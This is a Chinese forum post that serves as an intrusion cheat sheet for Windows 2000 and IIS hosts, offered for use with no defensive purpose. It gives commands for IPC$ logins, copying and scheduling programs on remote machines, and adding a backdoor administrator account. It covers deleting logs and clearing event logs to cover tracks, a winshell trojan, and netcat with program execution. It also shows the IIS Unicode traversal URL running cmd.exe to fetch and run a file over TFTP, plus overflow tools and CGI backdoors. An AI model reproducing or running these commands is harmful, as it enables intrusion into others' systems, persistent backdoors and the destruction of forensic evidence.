- 论坛徽章:
- 0
|
(与远程主机建立空管连接) net use \\\\IP地址\\ipc$ \"\" /use:\"\" \r\n\r\n(以管理员身份登录远程主机) net use \\\\IP地址\\ipc$ \"密码\" /use:\"Administrator\" \r\n\r\n(传送文件到远程主机WINNT目录下)copy 本机目录路径\\程序 \\\\IP地址\\admin$ \r\n\r\n(查看远程主机时间) net time \\\\IP地址 \r\n\r\n(定时启动某个程序) at \\\\IP地址 02:18 readme.exe \r\n\r\n(查看共享) net view \\\\IP地址 \r\n\r\n(查看netbios工作组列表) nbtstat -A IP地址 \r\n\r\n(将远程主机C盘映射为自己的F盘) net use f: \\\\IP地址\\c$ \"\"/user:\"Administrator\" \r\n\r\n(这两条把自己增加到管理员组): net user 用户名 密码 /add \r\n\r\nnet localgroup Administrators 用户名 /add \r\n\r\n(断开连接) net use \\\\IP地址\\ipc$ /delete \r\n\r\n===================================================== \r\n\r\n擦屁屁: \r\n\r\ndel C:\\winnt\\system32\\logfiles\\*.* \r\n\r\ndel C:\\winnt\\system32\\config\\*.evt \r\n\r\ndel C:\\winnt\\system32\\dtclog\\*.* \r\n\r\ndel C:\\winnt\\system32\\*.log \r\n\r\ndel C:\\winnt\\system32\\*.txt \r\n\r\ndel C:\\winnt\\*.txt \r\n\r\ndel C:\\winnt\\*.log \r\n\r\n一、netsvc.exe \r\n\r\n下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: \r\n\r\nnetsvc /list \\\\IP地址 \r\n\r\nnetsvc schedule \\\\IP地址 /query \r\n\r\nnetsvc \\\\IP地址 schedule /start \r\n\r\n二、OpenTelnet.exe \r\n\r\n远程启动主机的Telnet服务,并绑定端口到7878,例如: \r\n\r\nOpenTelnet \\\\IP地址 用户名 密码 1 7878 \r\n\r\n然后就可以telnet到主机的7878端口,进入DOS方式下: \r\n\r\ntelnet IP地址 7878 \r\n\r\n三、winshell.exe \r\n\r\n一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: \r\n\r\np Path (查看winshell主程序的路径信息) \r\n\r\nb reBoot (重新启动机器) \r\n\r\nd shutDown (关闭机器) \r\n\r\ns Shell (执行后你就会看到可爱的“C:\\>”) \r\n\r\nx eXit (退出本次登录会话,此命令并不终止winshell的运行) \r\n\r\nCMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) \r\n\r\n四、3389登陆器,GUI方式登录远程主机的 \r\n\r\n五、elsave.exe \r\n\r\n事件日志清除工具 \r\n\r\nelsave -s \\\\IP地址 -l \"application\" -C \r\n\r\nelsave -s \\\\IP地址 -l \"system\" -C \r\n\r\nelsave -s \\\\IP地址 -l \"security\" -C \r\n\r\n执行后成功清除应用程序日志,系统日志,安全日志 \r\n\r\n六、hbulot.exe \r\n\r\n开启win2kserver和winxp的3389服务 \r\n\r\nhbulot [/r] \r\n\r\n使用/r表示安装完成后自动重起目标使设置生效。 \r\n\r\n七、nc.exe(netcat.exe) \r\n\r\n一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 \r\n\r\n想要连接到某处: nc [-options] hostname port [ports] ... \r\n\r\n绑定端口等待连接: nc -l -p port [-options] [hostname] [port] \r\n\r\n参数: \r\n\r\n-e prog 程序重定向,一旦连接,就执行 [危险!!] \r\n\r\n-g gateway source-routing hop point, up to 8 \r\n\r\n-G num source-routing pointer: 4, 8, 12, ... \r\n\r\n-h 帮助信息 \r\n\r\n-i secs 延时的间隔 \r\n\r\n-l 监听模式,用于入站连接 \r\n\r\n-n 指定数字的IP地址,不能用hostname \r\n\r\n-o file 记录16进制的传输 \r\n\r\n-p port 本地端口号 \r\n\r\n-r 任意指定本地及远程端口 \r\n\r\n-s addr 本地源地址 \r\n\r\n-u UDP模式 \r\n\r\n-v 详细输出——用两个-v可得到更详细的内容 \r\n\r\n-w secs timeout的时间 \r\n\r\n-z 将输入输出关掉——用于扫描时 \r\n\r\n八、TFTPD32.EXE \r\n\r\n把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: \r\n\r\nhttp://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\\winnt\\system32\\文件名 \r\n\r\n然后可以直接令文件运行: \r\n\r\nhttp://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 \r\n\r\n九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 \r\n\r\n一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 \r\n\r\n一、一 Xscan命令行运行参数说明: \r\n\r\n在检测过程中,按\"[空格]\"键可以查看各线程状态及扫描进度,按\"q\"键保存当前数据后提前退出程序,按\"\"强行关闭程序。 \r\n\r\n1.命令格式: xscan -host [-] [其他选项] \r\n\r\nxscan -file [其他选项] \r\n\r\n其中 含义如下: \r\n\r\n-port : 检测常用服务的端口状态(可通过\\dat\\config.ini文件的\"PORT-SCAN-OPTIONS\\PORT-LIST\"项定制待检测端口列表); \r\n\r\n-ftp : 检测FTP弱口令(可通过\\dat\\config.ini文件设置用户名/密码字典文件); \r\n\r\n-ntpass : 检测NT-Server弱口令(可通过\\dat\\config.ini文件设置用户名/密码字典文件); \r\n\r\n-cgi : 检测CGI漏洞(可通过\\dat\\config.ini文件的\"CGI-ENCODE\\encode_type\"项设置编码方案); \r\n\r\n-iis : 检测IIS漏洞(可通过\\dat\\config.ini文件的\"CGI-ENCODE\\encode_type\"项设置编码方案); \r\n\r\n[其他选项] 含义如下: \r\n\r\n-v: 显示详细扫描进度 \r\n\r\n-p: 跳过Ping不通的主机 \r\n\r\n-o: 跳过没有检测到开放端口的主机 \r\n\r\n-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10 |
|